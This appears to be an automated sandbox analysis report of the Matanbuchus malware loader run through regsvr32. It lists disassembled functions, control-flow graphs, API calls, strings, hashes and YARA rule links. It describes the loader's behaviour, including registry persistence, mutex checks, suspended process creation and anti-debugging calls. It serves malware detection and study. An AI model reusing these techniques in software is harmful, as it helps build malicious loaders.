EnterCriticalSection 20180 7f6e9f90 35 API calls 2 library calls

                                                Executed Functions

                                                Function 6B6351C0 Relevance: 27.1, APIs: 7, Strings: 8, Instructions: 824COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2015907151.000000006B611000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B610000, based on PE: true
                                                • Associated: 00000006.00000002.2015892942.000000006B610000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2015933627.000000006B64B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2015950051.000000006B65A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2016092162.000000006BB07000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2016108438.000000006BB08000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_6b610000_regsvr32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: y='$*$8$AzureAD-SecureConv$E$TMP$WinHttpReadData$ntdll
                                                • API String ID: 0-3123300459
                                                • Opcode ID: 93693ac33872e20d6e6aae6f88c37403df7174ad3264901373af2da4a8a47893
                                                • Instruction ID: fe5200ab841c6c4208472d8e7e0dc21775046d21c0c794e21d4f5662a143e9d1
                                                • Opcode Fuzzy Hash: 93693ac33872e20d6e6aae6f88c37403df7174ad3264901373af2da4a8a47893
                                                • Instruction Fuzzy Hash: D19209B5D04268CFDF24CF6AC890BADBBB1BB4A304F1081DAD549A7344D7389A95CF64
                                                Function 7F6F77A0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 331synchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 86 7f6f77a0-7f6f79a0 87 7f6f7a3f-7f6f7a54 CreateMutexA 86->87 88 7f6f79a6-7f6f79a9 86->88 89 7f6f7a5a-7f6f7ab3 call 7f718fa0 87->89 90 7f6f7b44-7f6f7b4f GetLastError 87->90 91 7f6f7a14-7f6f7a39 88->91 92 7f6f79d2-7f6f79d8 88->92 93 7f6f79b0-7f6f79d0 88->93 94 7f6f7a00-7f6f7a12 88->94 104 7f6f7ac9 89->104 105 7f6f7ab5 89->105 98 7f6f7b55-7f6f7bd2 call 7f730b50 90->98 99 7f6f7ce0-7f6f7cf3 90->99 91->87 95 7f6f79ed-7f6f79f5 92->95 96 7f6f79da-7f6f79eb 92->96 93->87 94->87 100 7f6f79f8-7f6f79fe 95->100 96->100 109 7f6f7be9-7f6f7c02 98->109 110 7f6f7bd4-7f6f7bd8 98->110 103 7f6f7cf8-7f6f7cfc 99->103 100->87 111 7f6f7ad0-7f6f7ae9 104->111 107 7f6f7ab7-7f6f7abe 105->107 108 7f6f7ac0-7f6f7ac7 105->108 107->104 107->108 108->111 116 7f6f7cb6-7f6f7cde CloseHandle 109->116 112 7f6f7bda-7f6f7bde 110->112 113 7f6f7c07-7f6f7c0b 110->113 114 7f6f7aff 111->114 115 7f6f7aeb 111->115 120 7f6f7c9f-7f6f7cb3 112->120 121 7f6f7be4 112->121 117 7f6f7c0d-7f6f7c14 113->117 118 7f6f7c16 113->118 119 7f6f7b06-7f6f7b0c 114->119 122 7f6f7aed-7f6f7af4 115->122 123 7f6f7af6-7f6f7afd 115->123 116->103 124 7f6f7c1d-7f6f7c26 117->124 118->124 125 7f6f7b0e-7f6f7b3a call 7f730b50 119->125 126 7f6f7b3d-7f6f7b3f 119->126 120->116 121->116 122->114 122->123 123->119 127 7f6f7c28-7f6f7c2f 124->127 128 7f6f7c31 124->128 125->126 126->103 130 7f6f7c38-7f6f7c3e 127->130 128->130 132 7f6f7c49 130->132 133 7f6f7c40-7f6f7c47 130->133 134 7f6f7c50-7f6f7c59 132->134 133->134 135 7f6f7c6f-7f6f7c72 134->135 136 7f6f7c5b-7f6f7c6d 134->136 137 7f6f7c7a-7f6f7c9d 135->137 136->137 137->116
                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7F6F7A47
                                                • GetLastError.KERNEL32 ref: 7F6F7B44
                                                • CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7F6F7CBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateErrorHandleLastMutex
                                                • String ID: *$9mD$B$u${
                                                • API String ID: 4294037311-4130828584
                                                • Opcode ID: 09ff8ef81e6e8e8c66f5feced78eabec83dd7a2e974bbf0783686203c7c3842f
                                                • Instruction ID: 7223e23dfb67a1c3877c94f505288cc8bd343ceac11612d3bce15b7b51b613b4
                                                • Opcode Fuzzy Hash: 09ff8ef81e6e8e8c66f5feced78eabec83dd7a2e974bbf0783686203c7c3842f
                                                • Instruction Fuzzy Hash: D4F148B5D04359CFDB14CFAAC8907ADBBF1BF89310F28819AE459AB290D7345A81CF51
                                                Function 7F72CAF0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 289COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 138 7f72caf0-7f72cd91 GetSystemDirectoryW call 7f718840 140 7f72cd96-7f72d10b call 7f730b50 138->140 160 7f72e791-7f72e7af 140->160 161 7f72d111-7f72d161 call 7f6f7e00 140->161 162 7f72e864-7f72e881 160->162 163 7f72e7b5-7f72e7c2 160->163 161->160 168 7f72e885-7f72e88c 162->168 166 7f72e7d0 163->166 167 7f72e7c4-7f72e7ce 163->167 170 7f72e7da-7f72e7e1 166->170 167->170 171 7f72e7e3-7f72e7ed 170->171 172 7f72e7ef 170->172 173 7f72e7f9-7f72e805 171->173 172->173 174 7f72e822-7f72e846 173->174 175 7f72e807-7f72e820 173->175 176 7f72e862 174->176 177 7f72e848-7f72e85c 174->177 175->176 176->168 177->176
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7F72CCEE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DirectorySystem
                                                • String ID: )$2$?$m$n $e
                                                • API String ID: 2188284642-1749247282
                                                • Opcode ID: c0179397094d49a87ccc5ad87c5fa6f06041135790d448f0b1617b9397da98b1
                                                • Instruction ID: d40cac8aec9b3e7d718e00f60b86deace173a9eb9f91bd136a48330f378b85a9
                                                • Opcode Fuzzy Hash: c0179397094d49a87ccc5ad87c5fa6f06041135790d448f0b1617b9397da98b1
                                                • Instruction Fuzzy Hash: 93F14475D04369CBCB29CF6AC8847ADBBF2BF89311F2481DAD049AB290D7741A94CF51
                                                Function 7F719280 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 204COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 178 7f719280-7f71947e call 7f7195f0 180 7f719483-7f719495 178->180 181 7f7194a1-7f7194ab 180->181 182 7f719497-7f71949d GetShellWindow 180->182 183 7f7194c0-7f7194ec call 7f730b50 181->183 184 7f7194ad-7f7194be 181->184 182->181 190 7f7194f7 183->190 191 7f7194ee-7f7194f5 183->191 185 7f71950e-7f719526 184->185 188 7f719536-7f719539 185->188 189 7f719528-7f719534 185->189 192 7f71953e-7f71956d 188->192 189->192 193 7f7194fe-7f719507 190->193 191->193 194 7f719578 192->194 195 7f71956f-7f719576 192->195 193->185 196 7f71957f-7f719585 194->196 195->196 197 7f719590 196->197 198 7f719587-7f71958e 196->198 199 7f719597-7f7195ea 197->199 198->199
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ShellWindow
                                                • String ID: 2$MNo name attribute $Q$\$c
                                                • API String ID: 2831631499-3960561890
                                                • Opcode ID: ab7a08c9ac5d69647471b0c1efdf6d2a607bb1cf69890abc2e142fd7f24a7fa7
                                                • Instruction ID: 73bac12aa4ffa945121bd78f935f70760d48ce57a68153055ccd5704b9f17d86
                                                • Opcode Fuzzy Hash: ab7a08c9ac5d69647471b0c1efdf6d2a607bb1cf69890abc2e142fd7f24a7fa7
                                                • Instruction Fuzzy Hash: 7CA127B9D0435ACBDB18CFAAD48079DBBB1BF89310F28819ED448AB381D3745A95CF51
                                                Function 7F7195F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 200 7f7195f0-7f719815 201 7f719817-7f71984a 200->201 202 7f71984c-7f719853 200->202 203 7f71986f-7f71988b GetProcessHeap 201->203 202->203 204 7f719855-7f71986b 202->204 205 7f7198a0 203->205 206 7f71988d-7f719895 203->206 204->203 208 7f7198a7-7f7198ae 205->208 206->205 207 7f719897-7f71989e 206->207 207->208 209 7f7198b0-7f7198bc 208->209 210 7f7198be-7f7198c1 208->210 211 7f7198c6-7f7198d8 209->211 210->211 212 7f7198da 211->212 213 7f7198ed 211->213 214 7f7198e4-7f7198eb 212->214 215 7f7198dc-7f7198e2 212->215 216 7f7198f4-7f7198fc 213->216 214->216 215->213 215->214 217 7f71990c-7f719952 216->217 218 7f7198fe-7f719909 GetDriveTypeA 216->218 218->217
                                                APIs
                                                • GetProcessHeap.KERNEL32 ref: 7F71986F
                                                • GetDriveTypeA.KERNEL32(7F7581EC), ref: 7F719903
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DriveHeapProcessType
                                                • String ID: *
                                                • API String ID: 2912393814-163128923
                                                • Opcode ID: 978c35ae878add47e7110216d2533f6e6c262e51dd137e9c41e80e54dc008ab1
                                                • Instruction ID: 42479cddcadc3d94a2da73fa58d9d813de973dc9bf9de74b6beaeaaf4748ddda
                                                • Opcode Fuzzy Hash: 978c35ae878add47e7110216d2533f6e6c262e51dd137e9c41e80e54dc008ab1
                                                • Instruction Fuzzy Hash: 68A11679D0435ACBCB18CFAAD45079DBBB2BF89320F28859ED449AB340D7301A95CF51

                                                Non-executed Functions

                                                Function 7F731417 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7F731423
                                                • IsDebuggerPresent.KERNEL32 ref: 7F7314EF
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7F731508
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 7F731512
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: 7404986f67b87d8183b629eaf230d30e4a244f3c876bcc6c5ada1d6bcb445d1b
                                                • Instruction ID: 70111a17ddfa13de2148e7b15a1f9fdfaa989b7387172d32a39b9687a54bee10
                                                • Opcode Fuzzy Hash: 7404986f67b87d8183b629eaf230d30e4a244f3c876bcc6c5ada1d6bcb445d1b
                                                • Instruction Fuzzy Hash: D731F279D0132D9ADB10DFA0C949BCDBBB8AF08310F1041EAE40DAB250EBB19B85CF45
                                                Function 7F71E1C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: @
                                                • API String ID: 3732870572-2766056989
                                                • Opcode ID: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
                                                • Instruction ID: 1abf9f1aaa08cef002fc90ffca226d1ecf0bac1eaac90f180b9795775237a2ac
                                                • Opcode Fuzzy Hash: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
                                                • Instruction Fuzzy Hash: 39718FB8E04259DFCB08CF98C590AEEFBB1BF88304F248199D915AB345D734AA45CF95
                                                Function 7F6F6570 Relevance: 25.7, APIs: 4, Strings: 13, Instructions: 244COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 494 7f6f6570-7f6f65a7 call 7f730cc0 497 7f6f65ae-7f6f662b 494->497 498 7f6f6636-7f6f663a 497->498 499 7f6f663c-7f6f6670 498->499 500 7f6f6672-7f6f66b4 call 7f6e2020 498->500 499->498 505 7f6f66bb-7f6f66ce 500->505 506 7f6f66b6 500->506 508 7f6f66d9 505->508 509 7f6f66d0-7f6f66d7 505->509 507 7f6f6843-7f6f6847 506->507 510 7f6f685b-7f6f685f 507->510 511 7f6f6849-7f6f6856 call 7f6e1d80 507->511 512 7f6f66e0-7f6f66ec 508->512 509->512 516 7f6f6873-7f6f6898 call 7f7020f0 510->516 517 7f6f6861-7f6f686e call 7f6e1d80 510->517 511->510 514 7f6f66ee-7f6f66f9 512->514 515 7f6f66fc-7f6f6730 call 7f6e2080 512->515 514->515 526 7f6f6737-7f6f673e 515->526 527 7f6f6732 515->527 517->516 528 7f6f6745-7f6f674c 526->528 527->507 529 7f6f6835-7f6f683d 528->529 530 7f6f6752-7f6f6793 call 7f72f4d7 call 7f6e1ed0 528->530 529->497 529->507 536 7f6f679a-7f6f679e 530->536 537 7f6f6795 530->537 538 7f6f67b4-7f6f67ba 536->538 539 7f6f67a0-7f6f67af 536->539 537->529 540 7f6f67bc-7f6f67da GetProcessHeap HeapAlloc 538->540 541 7f6f67e0-7f6f6807 GetProcessHeap HeapReAlloc 538->541 539->529 542 7f6f67de 540->542 543 7f6f67dc 540->543 544 7f6f680b-7f6f6830 call 7f702be0 541->544 545 7f6f6809 541->545 542->544 543->529 544->528 545->529
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
                                                • API String ID: 0-285284801
                                                • Opcode ID: 978e51d8fc97cfc66d47f6e7410a8f1de3f742cbc66ec9112ebcc7b19a6ab748
                                                • Instruction ID: 7e4ad85b5ea1e439c87671791a08c20124049b9b9d3b277b7612c44473d35cce
                                                • Opcode Fuzzy Hash: 978e51d8fc97cfc66d47f6e7410a8f1de3f742cbc66ec9112ebcc7b19a6ab748
                                                • Instruction Fuzzy Hash: EAB14374D04288DFEB01CFA8C885BDEBBF1AF48304F104159E549BB380DBB66A45CB61
                                                Function 7F6DC1A0 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 353COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • d, xrefs: 7F6DC2E0
                                                • d, xrefs: 7F6DC445
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F6DC27E, 7F6DC424
                                                • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7F6DC283
                                                • d, xrefs: 7F6DC39C
                                                • @, xrefs: 7F6DC40D
                                                • n_chars < number_buffer.size() - 1, xrefs: 7F6DC429
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                                                • API String ID: 3758378126-3644039597
                                                • Opcode ID: b0bc2c88ee3451f0f5d13f313ff5c6b73a64325284385726ea95191dc4875af1
                                                • Instruction ID: deda65bb9d8dc5d52e1947c24186eb3dc99bcd65110bd85be6e15107099feb6e
                                                • Opcode Fuzzy Hash: b0bc2c88ee3451f0f5d13f313ff5c6b73a64325284385726ea95191dc4875af1
                                                • Instruction Fuzzy Hash: C0F1BE74D0125DDFDF14CF99C990B9DBBB2BB88304F10819AE919A7394D7306A85CF94
                                                Function 7F6DC650 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 320COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv__aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                                                • API String ID: 3839614884-178659603
                                                • Opcode ID: a9ae9cb20c831b20e1a51f73a32c306c4e1922d0c310c9d8414609ae057f2158
                                                • Instruction ID: 5e723144c4084196d7cc638bead58717731232e44b4e48079e7f8fc4a904a9e7
                                                • Opcode Fuzzy Hash: a9ae9cb20c831b20e1a51f73a32c306c4e1922d0c310c9d8414609ae057f2158
                                                • Instruction Fuzzy Hash: FDE1A174D05219DFDF14CF98C980B9DBBB2BF48304F2081AAE519AB394D7346A85CF94
                                                Function 7F72EF10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 100registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7F72EF39
                                                • wsprintfW.USER32 ref: 7F72EF86
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7F72EFA3
                                                • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7F72EFC4
                                                • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7F72EFE4
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7F72EFFD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7F72F008
                                                  • Part of subcall function 7F72F6E7: GetTickCount.KERNEL32 ref: 7F72F705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseValue$CountCreateOpenTickwsprintf
                                                • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                                                • API String ID: 730945307-550109914
                                                • Opcode ID: 7c6e4b04da0cc1ba9f5a8e86eb216171d15ef24528084bfeab5b2942e2f4b1e5
                                                • Instruction ID: 1b384030f744f727ec2195a08e7fe7b96e5d9bb2eeae25d2d3b255b695d7d2fc
                                                • Opcode Fuzzy Hash: 7c6e4b04da0cc1ba9f5a8e86eb216171d15ef24528084bfeab5b2942e2f4b1e5
                                                • Instruction Fuzzy Hash: 54312972A0021DBADB219A95DC49FDFBBBDEF48361F100065F609EB050D731AB65DBA0
                                                Function 7F72F11C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 246processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?), ref: 7F72F149
                                                • IsWow64Process.KERNEL32(00000000), ref: 7F72F150
                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7F72F18C
                                                • wsprintfW.USER32 ref: 7F72F21A
                                                • CloseHandle.KERNEL32(00000000), ref: 7F72F3A5
                                                • CloseHandle.KERNEL32(00000000), ref: 7F72F3B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                                                • String ID: 0x%x$?
                                                • API String ID: 3386633596-4137330559
                                                • Opcode ID: 6231e5ea43c3660b47ea37c56dc1d9f20f4be4931a9b7bcb95cf7eb147276d32
                                                • Instruction ID: e8db8cad2bceb430e73dff5cc388d6c801a20cf46f54571731e0eac009475647
                                                • Opcode Fuzzy Hash: 6231e5ea43c3660b47ea37c56dc1d9f20f4be4931a9b7bcb95cf7eb147276d32
                                                • Instruction Fuzzy Hash: 92812EB2E0120CAFEF019BA4CE85EEEB7FDEF08245F140069E915E7151E735AE548B60
                                                Function 7F733BE0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON
                                                Download Yara Rule
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 7F733C17
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 7F733C1F
                                                • _ValidateLocalCookies.LIBCMT ref: 7F733CA8
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 7F733CD3
                                                • _ValidateLocalCookies.LIBCMT ref: 7F733D28
                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 7F733D3E
                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 7F733D53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                • String ID: csm
                                                • API String ID: 1385549066-1018135373
                                                • Opcode ID: a71759491f182caaa792ef1a3857cd1c94e92c827e762cf49e208ab2f1d9ef72
                                                • Instruction ID: 853840dfc44084e5588ea336be31dc1a11a97ac4cf625c2390f8202bf8303050
                                                • Opcode Fuzzy Hash: a71759491f182caaa792ef1a3857cd1c94e92c827e762cf49e208ab2f1d9ef72
                                                • Instruction Fuzzy Hash: 4E41EE34E00389BBCF11CF68C984A9EBBB5EF45224F908195EC259F292C735AA15DB91
                                                Function 6B63FE80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 6B63FEB7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6B63FEBF
                                                • _ValidateLocalCookies.LIBCMT ref: 6B63FF48
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6B63FF73
                                                • _ValidateLocalCookies.LIBCMT ref: 6B63FFC8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2015907151.000000006B611000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B610000, based on PE: true
                                                • Associated: 00000006.00000002.2015892942.000000006B610000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2015933627.000000006B64B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2015950051.000000006B65A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2016092162.000000006BB07000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2016108438.000000006BB08000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_6b610000_regsvr32.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm$csm
                                                • API String ID: 1170836740-3733052814
                                                • Opcode ID: 7252645f6cbf3536c847fea0a7ba65a5de0477f354f77bb3a72a03a5e03e4581
                                                • Instruction ID: efa62531fb50b942fb8e3c882940595e451f176c2a68382b6c29a892569711fb
                                                • Opcode Fuzzy Hash: 7252645f6cbf3536c847fea0a7ba65a5de0477f354f77bb3a72a03a5e03e4581
                                                • Instruction Fuzzy Hash: B951C5B4A006299FCF00DF68C840A9E7BB5FF46718F14C199E8199B3A2D73AD951CB91
                                                Function 7F72C5A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 206COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsCharLowerA.USER32(00000073), ref: 7F72C78A
                                                • GetModuleFileNameW.KERNEL32(00000000,kernel32,00000000), ref: 7F72C7AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CharFileLowerModuleName
                                                • String ID: 9mD$kernel32$u${
                                                • API String ID: 515556390-2230072418
                                                • Opcode ID: 3aa30b6687309bf164a76808b1d91ff0470156eb35b0acff8459001766dc6184
                                                • Instruction ID: 879545435365b80c3eebe473a95b9eef233a44547c2c3fd23729ca539402cb00
                                                • Opcode Fuzzy Hash: 3aa30b6687309bf164a76808b1d91ff0470156eb35b0acff8459001766dc6184
                                                • Instruction Fuzzy Hash: 2AB132B9D04359CEDB24CFAAC84079DBBF1BF98320F24819AD458AB391E7341A95CF51
                                                Function 6B634C40 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 153COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 6B634DE7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2015907151.000000006B611000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B610000, based on PE: true
                                                • Associated: 00000006.00000002.2015892942.000000006B610000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2015933627.000000006B64B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2015950051.000000006B65A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2016092162.000000006BB07000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2016108438.000000006BB08000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_6b610000_regsvr32.jbxd
                                                Similarity
                                                • API ID: DirectorySystem
                                                • String ID: ($8$?2$GB$r
                                                • API String ID: 2188284642-435796455
                                                • Opcode ID: 9be49e0ea2ac8cfb546313509feb016989554b5bbf3bc19e7d1a146eec88d5e6
                                                • Instruction ID: f96a7984be759777e09c89e73fd855bcd911577cfba0c2f426cac3fef16bff03
                                                • Opcode Fuzzy Hash: 9be49e0ea2ac8cfb546313509feb016989554b5bbf3bc19e7d1a146eec88d5e6
                                                • Instruction Fuzzy Hash: C27138759042988FCF24CFAAC4806ADBFF1BB5A304F14819AE498A7395E7388655CF25
                                                Function 6B63CEF0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 93sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 6B63D09A
                                                • Sleep.KERNEL32(00000064), ref: 6B63D0A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2015907151.000000006B611000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B610000, based on PE: true
                                                • Associated: 00000006.00000002.2015892942.000000006B610000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2015933627.000000006B64B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000006.00000002.2015950051.000000006B65A000.00000004.00000001.01000000.00000008.sdmpDownload File
